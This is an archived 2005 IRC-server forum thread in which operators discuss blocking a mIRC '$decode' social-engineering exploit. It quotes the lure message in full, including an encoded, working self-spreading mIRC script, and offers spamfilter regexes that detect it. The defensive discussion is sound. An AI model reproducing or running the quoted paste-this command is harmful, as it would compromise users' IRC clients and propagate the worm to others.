decode exploit

These are old archives. They are kept for historic purposes only.
Post Reply
droolin
Posts: 42
Joined: Sat Dec 04, 2004 7:27 pm
Location: USA - Ohio
Contact:

decode exploit

Post by droolin » Thu Sep 08, 2005 12:16 pm

We received a decode exploit pm yesterday, and I thought it was covered.
The message was
<noxchi_rose> Want to be an OPERATOR in #mircpopup-magic ? copy/paste this-> //write   $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIFdhbnQgdG8gYmUgYW4gT1BFUkFUT1IgaW4gJGNoYW4gPyBjb3B5L3Bhc3RlIHRoaXMtPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,
What I think was set up in the spamfilter.conf to catch this which is commented out is the following:

Code: Select all

/*
spamfilter {
        regex "//write \$decode\(.+\|.+load -rs";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
*/
Would this work???

Code: Select all

spamfilter {
        regex "//write \$decode\(.+";
        target { private; channel; };
        reason "Generic $decode exploit";
        action block;
};
Any help on this would be greatly appriceated

droolin
Hornyness is a perpetual thang. The hornier you are, the hornier your going to be.

DeadNotBuried
Posts: 44
Joined: Wed Mar 10, 2004 5:30 am
Location: irc.majestic-liaisons.com
Contact:

Post by DeadNotBuried » Thu Sep 08, 2005 4:21 pm

it looks to me like they added an extra space before the $decode to get around the spamfilters.

i'd suggest using ".*//write +\$decode\(.+" as the regex as it will get any number of spaces in there, or for the truly paranoid ".*\$decode.*"
Majestic Liaisons Adult Chat - [url=irc://irc.majestic-liaisons.com:6667]IRC[/url] , Java

droolin
Posts: 42
Joined: Sat Dec 04, 2004 7:27 pm
Location: USA - Ohio
Contact:

thank you, very much appriceated

Post by droolin » Thu Sep 08, 2005 4:41 pm

God, I really am blind. I did not see the extra space at all.
Appriceate the help.

droolin
Hornyness is a perpetual thang. The hornier you are, the hornier your going to be.

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Fri Sep 09, 2005 4:49 am

Also, you need to double the \ used in spamfilters in the config file (not those in /spamfilter).

Personally, I'd just use this:

Code: Select all

spamfilter {
    word "\\$decode";
    target "pcnNPqat";
    reason "Just use /dcc ...";
    action block;
};
There's about nothing I can think of that I'd use $decode rather than /dcc.

droolin
Posts: 42
Joined: Sat Dec 04, 2004 7:27 pm
Location: USA - Ohio
Contact:

I did think about that

Post by droolin » Fri Sep 09, 2005 12:14 pm

I was thinking, who would use the $decode in a normal conversation.
We have some scripters, but basicatly I don't see them using the decode for anything.
The only thing I was worried about was when people were kicking scripting ideas around, on how to best do something.
And possibly getting caught then.
If we keep having problems though, thats what I'll end up doing. Solves the problem once and for all.

Thank you, very much appriceated.

droolin
Hornyness is a perpetual thang. The hornier you are, the hornier your going to be.

Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason » Sat Sep 10, 2005 10:24 pm

Why are we trying to escape the $ in $decode? It has no meaning except as the last character.
Why the hell can't my signature be empty?
"Your message contains too few characters."

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Sat Sep 10, 2005 10:30 pm

Because I'm paranoid like that? :P

Post Reply